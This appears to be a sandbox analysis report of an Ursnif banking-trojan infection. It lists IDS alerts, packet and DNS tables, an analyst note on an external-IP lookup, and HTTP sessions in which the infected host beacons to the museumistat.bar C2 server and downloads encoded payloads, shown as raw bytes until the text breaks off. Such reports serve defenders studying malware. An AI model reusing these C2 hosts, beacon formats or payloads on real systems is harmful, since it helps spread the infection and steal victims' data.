01/19/22-11:50:36.812525 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49752 | 80 | 192.168.2.3 | 31.41.44.3
01/19/22-11:50:37.431406 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49754 | 80 | 192.168.2.3 | 31.41.44.3
01/19/22-11:50:37.431406 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49754 | 80 | 192.168.2.3 | 31.41.44.3
01/19/22-11:50:39.179826 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49756 | 80 | 192.168.2.3 | 31.41.44.3
01/19/22-11:50:42.294394 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49754 | 80 | 192.168.2.3 | 31.41.44.3
01/19/22-11:50:42.294394 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49754 | 80 | 192.168.2.3 | 31.41.44.3
01/19/22-11:51:35.953320 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49763 | 80 | 192.168.2.3 | 62.173.145.37
01/19/22-11:51:35.953320 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49763 | 80 | 192.168.2.3 | 62.173.145.37
01/19/22-11:51:36.082177 | TCP | 2021813 | ET TROJAN Ursnif Variant CnC Beacon | 49764 | 80 | 192.168.2.3 | 62.173.149.135
01/19/22-11:51:36.082177 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49764 | 80 | 192.168.2.3 | 62.173.149.135

                  Network Port Distribution

                  TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 19, 2022 11:50:27.726514101 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:27.727549076 CET | 49749 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:27.787806034 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:27.787961960 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:27.788887024 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:27.791126013 CET | 80 | 49749 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:27.791309118 CET | 49749 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:27.849400997 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.113239050 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.113308907 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.113351107 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.113379002 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.113470078 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.113518953 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.114420891 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.114464045 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.114502907 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.114533901 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.114583969 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.115042925 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.115084887 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.115123034 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.115164995 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.115190983 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.175230026 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.175297976 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.175337076 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.175375938 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.175375938 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.175410986 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.175415993 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.175417900 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.175456047 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.175482988 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.175493956 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.175508022 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.175534964 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.175549030 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.175575972 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.175586939 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.175620079 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.175636053 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.175658941 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.175674915 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.175699949 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.175714016 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.175740004 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.175755978 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.175780058 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.175793886 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.175818920 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.175832987 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.175858021 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.175890923 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.175899029 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.175935030 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.175941944 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.175961971 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.175980091 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.176022053 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.176047087 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.176084995 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.236424923 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.236493111 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.236535072 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.236576080 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.236614943 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.236654043 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.236692905 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.236696959 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.236733913 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.236741066 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.236747980 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.236753941 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.236758947 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.236777067 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.236815929 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.236829996 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.236855030 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.236876011 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.236893892 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.236913919 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.236931086 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.236946106 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.236969948 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.236980915 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.237009048 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.237023115 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.237047911 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.237062931 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.237088919 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.237097979 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.237127066 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.237140894 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.237169027 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.237175941 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.237209082 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.237219095 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3
Jan 19, 2022 11:50:28.237251997 CET | 80 | 49748 | 31.41.44.3 | 192.168.2.3
Jan 19, 2022 11:50:28.237261057 CET | 49748 | 80 | 192.168.2.3 | 31.41.44.3

                  UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 19, 2022 11:50:27.684565067 CET | 54154 | 53 | 192.168.2.3 | 8.8.8.8
Jan 19, 2022 11:50:27.706737995 CET | 53 | 54154 | 8.8.8.8 | 192.168.2.3
Jan 19, 2022 11:50:30.798455000 CET | 52806 | 53 | 192.168.2.3 | 8.8.8.8
Jan 19, 2022 11:50:30.820369005 CET | 53 | 52806 | 8.8.8.8 | 192.168.2.3
Jan 19, 2022 11:50:32.609206915 CET | 53910 | 53 | 192.168.2.3 | 8.8.8.8
Jan 19, 2022 11:50:32.626358986 CET | 53 | 53910 | 8.8.8.8 | 192.168.2.3
Jan 19, 2022 11:50:32.634511948 CET | 64021 | 53 | 192.168.2.3 | 8.8.8.8
Jan 19, 2022 11:50:32.651271105 CET | 53 | 64021 | 8.8.8.8 | 192.168.2.3
Jan 19, 2022 11:50:36.258855104 CET | 60784 | 53 | 192.168.2.3 | 8.8.8.8
Jan 19, 2022 11:50:36.280985117 CET | 53 | 60784 | 8.8.8.8 | 192.168.2.3
Jan 19, 2022 11:51:34.793169975 CET | 49573 | 53 | 192.168.2.3 | 208.67.222.222
Jan 19, 2022 11:51:34.809602976 CET | 53 | 49573 | 208.67.222.222 | 192.168.2.3
Jan 19, 2022 11:51:34.817130089 CET | 49574 | 53 | 192.168.2.3 | 208.67.222.222
Jan 19, 2022 11:51:34.833463907 CET | 53 | 49574 | 208.67.222.222 | 192.168.2.3
Jan 19, 2022 11:51:34.838061094 CET | 49575 | 53 | 192.168.2.3 | 208.67.222.222
Jan 19, 2022 11:51:34.854393959 CET | 53 | 49575 | 208.67.222.222 | 192.168.2.3

                  DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 19, 2022 11:50:27.684565067 CET | 192.168.2.3 | 8.8.8.8 | 0x3086 | Standard query (0) | museumistat.bar | A (IP address) | IN (0x0001)
Jan 19, 2022 11:50:30.798455000 CET | 192.168.2.3 | 8.8.8.8 | 0xb79c | Standard query (0) | museumistat.bar | A (IP address) | IN (0x0001)
Jan 19, 2022 11:50:32.609206915 CET | 192.168.2.3 | 8.8.8.8 | 0x18f7 | Standard query (0) | museumistat.bar | A (IP address) | IN (0x0001)
Jan 19, 2022 11:50:32.634511948 CET | 192.168.2.3 | 8.8.8.8 | 0x114e | Standard query (0) | museumistat.bar | A (IP address) | IN (0x0001)
Jan 19, 2022 11:50:36.258855104 CET | 192.168.2.3 | 8.8.8.8 | 0xbae0 | Standard query (0) | museumistat.bar | A (IP address) | IN (0x0001)
Jan 19, 2022 11:51:34.793169975 CET | 192.168.2.3 | 208.67.222.222 | 0x1 | Standard query (0) | 222.222.67.208.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Jan 19, 2022 11:51:34.817130089 CET | 192.168.2.3 | 208.67.222.222 | 0x2 | Standard query (0) | myip.opendns.com | A (IP address) | IN (0x0001)
Jan 19, 2022 11:51:34.838061094 CET | 192.168.2.3 | 208.67.222.222 | 0x3 | Standard query (0) | myip.opendns.com | AAAA (28) | IN (0x0001)

The last three queries bypass the configured resolver (8.8.8.8) and go straight to the OpenDNS resolver 208.67.222.222: a PTR lookup of the resolver itself, then A and AAAA lookups of myip.opendns.com, which OpenDNS answers with the public address of the querying client. Sequential transaction IDs 0x1, 0x2, 0x3 and a hard-coded server are consistent with a direct query tool rather than the Windows stub resolver, which would use the configured server and random IDs. This is the infected host learning its own external IP address.

                  DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 19, 2022 11:50:27.706737995 CET | 8.8.8.8 | 192.168.2.3 | 0x3086 | No error (0) | museumistat.bar | - | 31.41.44.3 | A (IP address) | IN (0x0001)
Jan 19, 2022 11:50:30.820369005 CET | 8.8.8.8 | 192.168.2.3 | 0xb79c | No error (0) | museumistat.bar | - | 31.41.44.3 | A (IP address) | IN (0x0001)
Jan 19, 2022 11:50:32.626358986 CET | 8.8.8.8 | 192.168.2.3 | 0x18f7 | No error (0) | museumistat.bar | - | 31.41.44.3 | A (IP address) | IN (0x0001)
Jan 19, 2022 11:50:32.651271105 CET | 8.8.8.8 | 192.168.2.3 | 0x114e | No error (0) | museumistat.bar | - | 31.41.44.3 | A (IP address) | IN (0x0001)
Jan 19, 2022 11:50:36.280985117 CET | 8.8.8.8 | 192.168.2.3 | 0xbae0 | No error (0) | museumistat.bar | - | 31.41.44.3 | A (IP address) | IN (0x0001)
Jan 19, 2022 11:51:34.809602976 CET | 208.67.222.222 | 192.168.2.3 | 0x1 | No error (0) | 222.222.67.208.in-addr.arpa | - | - | PTR (Pointer record) | IN (0x0001)
Jan 19, 2022 11:51:34.809602976 CET | 208.67.222.222 | 192.168.2.3 | 0x1 | No error (0) | 222.222.67.208.in-addr.arpa | - | - | PTR (Pointer record) | IN (0x0001)
Jan 19, 2022 11:51:34.809602976 CET | 208.67.222.222 | 192.168.2.3 | 0x1 | No error (0) | 222.222.67.208.in-addr.arpa | - | - | PTR (Pointer record) | IN (0x0001)
Jan 19, 2022 11:51:34.833463907 CET | 208.67.222.222 | 192.168.2.3 | 0x2 | No error (0) | myip.opendns.com | - | 102.129.143.42 | A (IP address) | IN (0x0001)

                  HTTP Request Dependency Graph

                  • museumistat.bar

                  HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49748 | 31.41.44.3 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
Jan 19, 2022 11:50:27.788887024 CET | 1107 | OUT | GET /drew/wEnwCvgRr/tkjGrRWK504Gps4HB3Fh/a_2BgTA9pNLu5RTmMnf/cmF_2FoZExPeCfaavPGpw5/C4a_2B98FiRPO/vd2Nyn5c/h1bh48eCW9576sdvhYLet1i/wAsWnHJnYc/cKnuGYGL3HaarUE97/qNDbxnUrqa6o/sHAvWKK0ZF_/2FEfhnIyqYNHjo/0w_2F7ABHTCX38bGaal1i/N2IxD5P36ZAbXvHE/ihtoW7NXLZjCM45/tPYjxR5L6h/zPvdL.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: museumistat.bar
                  Connection: Keep-Alive
Jan 19, 2022 11:50:28.113239050 CET | 1108 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.10.3 (Ubuntu)
                  Date: Wed, 19 Jan 2022 10:50:28 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 246652
                  Connection: keep-alive
                  Pragma: public
                  Accept-Ranges: bytes
                  Expires: 0
                  Cache-Control: must-revalidate, post-check=0, pre-check=0
                  Content-Disposition: inline; filename="61e7ecf40e475.bin"
                  Data Raw: 51 59 47 5a 59 79 39 48 57 2f 73 4e 35 51 6a 64 42 41 75 6e 54 4e 71 74 75 73 6d 32 4c 43 54 4e 33 4c 65 52 49 53 65 79 78 6e 48 74 67 31 30 6e 6a 6e 52 69 48 78 38 4c 69 67 65 37 2b 7a 51 4c 32 57 38 65 39 61 75 43 61 4a 41 70 64 41 2b 43 34 56 52 31 38 6a 37 38 63 5a 32 6d 50 65 4f 59 75 76 61 51 44 35 52 67 36 54 4d 33 41 41 74 74 58 64 5a 74 64 62 42 42 36 79 6b 6d 4f 30 77 75 47 6a 75 42 59 39 6c 47 45 2b 70 4a 45 74 56 74 45 38 4c 6b 56 72 57 59 76 34 6d 78 67 31 42 51 4e 57 59 72 6c 6f 78 63 77 69 54 32 2b 37 64 2b 74 79 59 58 69 6f 76 70 55 6f 53 6f 4c 51 54 4c 2b 66 32 45 79 62 6a 58 31 45 33 72 4d 65 34 54 36 46 2b 52 42 4a 50 55 57 76 31 50 31 4a 4a 66 70 50 63 2f 41 72 32 36 48 34 2f 66 4d 69 65 6f 6c 64 61 45 65 45 36 4f 5a 61 79 65 61 4a 39 65 49 78 4e 44 4f 37 44 37 63 2f 52 77 2f 67 30 72 74 4a 5a 42 64 35 37 48 38 73 6e 51 56 54 34 35 6b 43 65 74 4c 51 68 4a 49 4e 33 6f 2f 73 7a 6b 41 4e 45 55 42 36 61 49 50 68 51 73 42 4e 6a 52 63 59 79 4c 63 31 33 33 71 30 79 7a 45 6f 79 6b 79 6f 66 72 54 72 54 51 34 51 6f 48 54 39 32 31 4f 68 64 49 37 4e 30 71 49 65 7a 62 77 43 66 71 54 38 56 46 63 43 32 33 59 6a 58 5a 37 5a 56 55 46 5a 75 49 49 6c 39 30 59 39 4b 75 79 76 53 36 35 75 36 58 67 7a 4e 51 74 35 48 4d 47 4f 46 59 70 6d 66 6c 4f 69 66 68 2b 49 7a 41 4d 72 54 30 33 49 71 54 43 50 64 4f 68 57 45 70 6a 62 6b 4a 63 35 6b 4b 75 55 51 73 51 6c 61 52 6f 55 33 36 49 41 56 33 6f 68 42 6e 31 49 6d 49 46 59 32 6c 65 71 52 35 54 6c 51 39 5a 4f 48 61 45 48 61 36 51 4e 67 6e 45 47 36 78 62 6e 4e 4a 32 2b 55 59 37 4a 69 44 69 51 6a 42 5a 72 43 62 37 2b 47 68 78 6e 5a 53 46 68 74 66 41 63 4d 55 32 58 63 47 77 77 56 32 75 4a 6f 49 78 74 37 76 4c 38 46 39 54 6c 68 52 4d 6d 41 2f 52 7a 52 36 56 74 38 78 5a 66 39 52 6b 52 33 65 31 70 39 74 6f 46 5a 33 6f 34 63 48 59 55 76 33 49 6e 57 43 71 50 73 42 6e 6f 6a 48 38 78 45 4d 30 56 62 6a 68 65 42 58 6f 61 78 68 42 51 39 5a 36 2f 66 78 6e 2f 32 48 63 58 72 62 31 63 38 69 62 36 6c 75 45 4b 6e 57 64 
43 4c 36 75 7a 6c 48 7a 63 42 6b 4d 61 4f 44 44 30 59 5a 63 70 6b 69 57 73 2f 36 73 67 59 49 61 46 33 64 59 6f 52 5a 51 59 44 55 52 4e 36 76 4c 7a 42 74 58 74 5a 4d 42 61 55 57 72 6f 68 51 64 54 64 6e 34 75 7a 4a 6a 63 6e 77 42 4c 6e 76 50 79 4f 2b 54 46 75 43 4e 6a 58 4d 69 54 32 47 79 2f 6a 2f 48 70 33 6c 57 58 66 52 48 6f 6a 6a 65 68 70 4f 63 4a 61 70 57 69 75 70 6e 61 64 62 71 75 78 47 6e 36 30 58 68 6c 45 61 77 4a 63 62 30 70 39 73 74 79 7a 4d 36 6f 63 61 43 41 64 74 4f 56 74 76 48 48 37 4e 65 52 51 74 73 2b 68 4a 35 47 50 38 30 56 76 31 5a 63 2f 58 72 33 6c 55 6c 6a 4f 31 64 75 74 79 76 6a 37 72 75 64 72 36 67 6a 69 39 56 31 45 6a 31 35 32 75 65 51 77 55 41 33 68 6a 43 4d 64 70 47 47 78 72 6e 57 63 78 71 50 54 74 49 71 53 47 36 51 56 56 38 70 75 5a 50 53 56 35 4b 38 75 44 46 43 53 31 51 2f 4a 63 45 2b 76 6c 73 54 52 50 74 49 43 48 72 75 34 44 38 4b 4e 2f 67 4e 66 6d 4c 59 36 4b 6c 59 30 77 2f 75 55 61 35 61 48 45 6a 68 61 44 6c 56 62 6f 2b 4e 7a 30 51 56 6e 2b 48 45 2f 6d 4c 37 6f 72 37 67 44
                  Data Ascii: QYGZYy9HW/sN5QjdBAunTNqtusm2LCTN3LeRISeyxnHtg10njnRiHx8Lige7+zQL2W8e9auCaJApdA+C4VR18j78cZ2mPeOYuvaQD5Rg6TM3AAttXdZtdbBB6ykmO0wuGjuBY9lGE+pJEtVtE8LkVrWYv4mxg1BQNWYrloxcwiT2+7d+tyYXiovpUoSoLQTL+f2EybjX1E3rMe4T6F+RBJPUWv1P1JJfpPc/Ar26H4/fMieoldaEeE6OZayeaJ9eIxNDO7D7c/Rw/g0rtJZBd57H8snQVT45kCetLQhJIN3o/szkANEUB6aIPhQsBNjRcYyLc133q0yzEoykyofrTrTQ4QoHT921OhdI7N0qIezbwCfqT8VFcC23YjXZ7ZVUFZuIIl90Y9KuyvS65u6XgzNQt5HMGOFYpmflOifh+IzAMrT03IqTCPdOhWEpjbkJc5kKuUQsQlaRoU36IAV3ohBn1ImIFY2leqR5TlQ9ZOHaEHa6QNgnEG6xbnNJ2+UY7JiDiQjBZrCb7+GhxnZSFhtfAcMU2XcGwwV2uJoIxt7vL8F9TlhRMmA/RzR6Vt8xZf9RkR3e1p9toFZ3o4cHYUv3InWCqPsBnojH8xEM0VbjheBXoaxhBQ9Z6/fxn/2HcXrb1c8ib6luEKnWdCL6uzlHzcBkMaODD0YZcpkiWs/6sgYIaF3dYoRZQYDURN6vLzBtXtZMBaUWrohQdTdn4uzJjcnwBLnvPyO+TFuCNjXMiT2Gy/j/Hp3lWXfRHojjehpOcJapWiupnadbquxGn60XhlEawJcb0p9styzM6ocaCAdtOVtvHH7NeRQts+hJ5GP80Vv1Zc/Xr3lUljO1dutyvj7rudr6gji9V1Ej152ueQwUA3hjCMdpGGxrnWcxqPTtIqSG6QVV8puZPSV5K8uDFCS1Q/JcE+vlsTRPtICHru4D8KN/gNfmLY6KlY0w/uUa5aHEjhaDlVbo+Nz0QVn+HE/mL7or7gD
Jan 19, 2022 11:50:28.707902908 CET | 1368 | OUT | GET /favicon.ico HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Host: museumistat.bar
                  Connection: Keep-Alive
                  Jan 19, 2022 11:50:28.855721951 CET | 1369 | IN | HTTP/1.1 404 Not Found
                  Server: nginx/1.10.3 (Ubuntu)
                  Date: Wed, 19 Jan 2022 10:50:28 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Vary: Accept-Encoding
                  Content-Encoding: gzip
                  Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  1 | 192.168.2.3 | 49751 | 31.41.44.3 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 19, 2022 11:50:30.910902977 CET | 1370 | OUT | GET /drew/iAVgwY_2F4_2B2wf10X/FKX8zCBs2KovZS3yYcqVUR/0_2BOKZVcXEno/mLNHqO4f/FdsEVjQZNrZLxNNjyopPvLU/cfGGvFKVJ_/2Fi2PnS811OxATftg/nfhcscYxJdSk/zsHccq2aXfw/iNTGalrAEj6HyF/BYyf3V_2B8kuM2spwKkvI/q_2Bf_2F7dIejZy3/x_2FpxM8IMFGs4y/_2Blb0vaFR2hoHDVFC/Nq2TJxK8w/aDcpB_2By_2F0bU0gDru/h6N_2BG_/2Fyz6.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: museumistat.bar
                  Connection: Keep-Alive
                  Jan 19, 2022 11:50:31.236540079 CET | 1371 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.10.3 (Ubuntu)
                  Date: Wed, 19 Jan 2022 10:50:31 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 315596
                  Connection: keep-alive
                  Pragma: public
                  Accept-Ranges: bytes
                  Expires: 0
                  Cache-Control: must-revalidate, post-check=0, pre-check=0
                  Content-Disposition: inline; filename="61e7ecf72c368.bin"
                  Data Raw: 65 57 49 79 65 68 39 31 50 42 42 6e 31 56 6a 36 65 34 4d 6f 4e 62 59 6d 76 6c 58 30 4e 30 4b 6f 6f 34 4a 33 76 41 47 76 31 69 5a 61 7a 7a 50 34 46 48 38 39 6c 4a 63 78 30 2f 74 36 70 58 36 57 67 53 77 6c 72 6a 68 4d 74 42 37 47 72 65 7a 4e 66 37 73 4e 30 64 6c 44 69 6b 70 65 5a 33 2b 44 35 2f 64 2f 50 6e 37 5a 33 6a 30 6a 51 33 79 49 66 6e 32 63 71 4f 6e 35 41 66 5a 61 63 31 31 4e 4a 79 57 68 74 55 76 6a 4e 42 42 42 51 63 6a 5a 67 73 48 48 62 75 33 74 4c 2b 62 63 55 43 4a 5a 42 72 37 59 57 48 41 6f 63 2f 79 7a 32 65 75 67 4a 79 71 79 4f 30 42 6a 64 33 53 59 52 4c 63 56 74 53 62 4f 61 46 33 5a 39 70 63 30 2b 50 70 4b 71 73 6c 73 73 6d 51 6e 64 49 59 55 2b 73 72 30 35 35 77 6e 5a 44 61 6e 69 4f 56 71 30 46 46 48 65 6a 59 66 4d 4d 38 74 53 43 41 50 6d 6b 4f 73 4c 4d 6f 54 6b 36 37 66 68 54 53 47 47 6e 2f 59 2f 43 41 72 57 58 51 69 79 4d 4d 47 74 4b 39 4f 48 59 63 41 30 78 57 47 62 73 78 7a 4e 70 42 6d 68 4c 49 79 59 41 2f 73 73 7a 6b 6e 32 52 67 4f 59 61 39 65 52 67 56 7a 71 75 42 2b 63 47 41 4a 